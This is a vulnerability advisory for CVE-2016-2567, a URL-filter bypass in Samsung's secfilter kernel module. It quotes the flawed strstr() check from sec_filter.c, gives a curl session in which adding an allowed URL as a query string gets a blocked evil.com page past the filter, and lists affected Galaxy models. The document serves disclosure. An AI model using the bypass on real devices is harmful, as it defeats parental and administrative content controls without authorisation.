Switch branches/tags
Nothing to show
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
..
Failed to load latest commit information.
README.md

README.md

URL filtering bypass in Samsung module 'secfilter'

  • Authors: Aristide Fattori (@joystick) and Roberto Paleari (@rpaleari)
  • ID: CVE-2016-2567
  • Notification date: 30/10/2015
  • Release date: 24/02/2016

Some weeks ago we wrote about secfilter, a proprietary Samsung kernel module for supporting URL filtering applications (e.g., for parental control).

Besides the NULL pointer dereference described in the previous advisory, we also identified a pretty trivial bypass technique which permits a user-space application to completely circumvent the URL filtering system.

In a nutshell, the App which controls the URL filtering mechanism (secfilter) can choose an "exceptional URL" that is automatically whitelisted by the kernel module, as shown in the code above. The relevant source code snippet that implements this behavior is reported below (from sec_filter.c):

// Check this is exceptional URL
if ((exceptionURL != NULL) && (gettingNode->url !=NULL))        {
	//This is exception URL
	if (strstr(&gettingNode->url[sizeof(URL_Info)], exceptionURL) != NULL)
	  {
		free_tcp_TrackInfo(gettingNode);      // Free this getting track info
		nf_reinject(entry, NF_ACCEPT);        // Send this packet because it is exception
		return 0;
	  }
  }

In the code snippet above the "exceptional URL" is represented by the character string pointed by exceptionURL, while gettingNode->url is the URL the user is trying to access.

However, the check is performed through a strstr() call. This permits local applications to completely circumvent the URL filtering mechanism, just by including an "exceptional URL" string among the GET parameters.

As an example, assume that exceptionURL has been set to http://google.com/. Then, visiting http://evil.com/?http://google.com would allow to bypass the filter completely. This is also demonstrated by the following shell session:

$ curl -v http://evil.com/
*   Trying 192.220.74.179...
* Connected to evil.com (192.220.74.179) port 80 (#0)
> GET / HTTP/1.1
> Host: evil.com
> User-Agent: curl/7.45.0
> Accept: */*
>
< HTTP/1.1 404 Not Found
< Content-Type: text/html
< Content-Length: 60
<
<html><head></head><body>This Site is Blocked!</body></html>

$  curl -v http://evil.com/?http://google.com/
*   Trying 192.220.74.179...
* Connected to evil.com (192.220.74.179) port 80 (#0)
> GET /?http://google.com/ HTTP/1.1
> Host: evil.com
> User-Agent: curl/7.45.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Wed, 28 Oct 2015 10:16:51 GMT
< Server: Apache

Affected devices

We confirm this issue affects the following device models. Other models and firmware versions are probably affected as well, but they were not tested.

  • SM-N9005, build N9005XXUGBOB6 (Note 3)
  • SM-G920F, build G920FXXU2COH2 (Galaxy S6)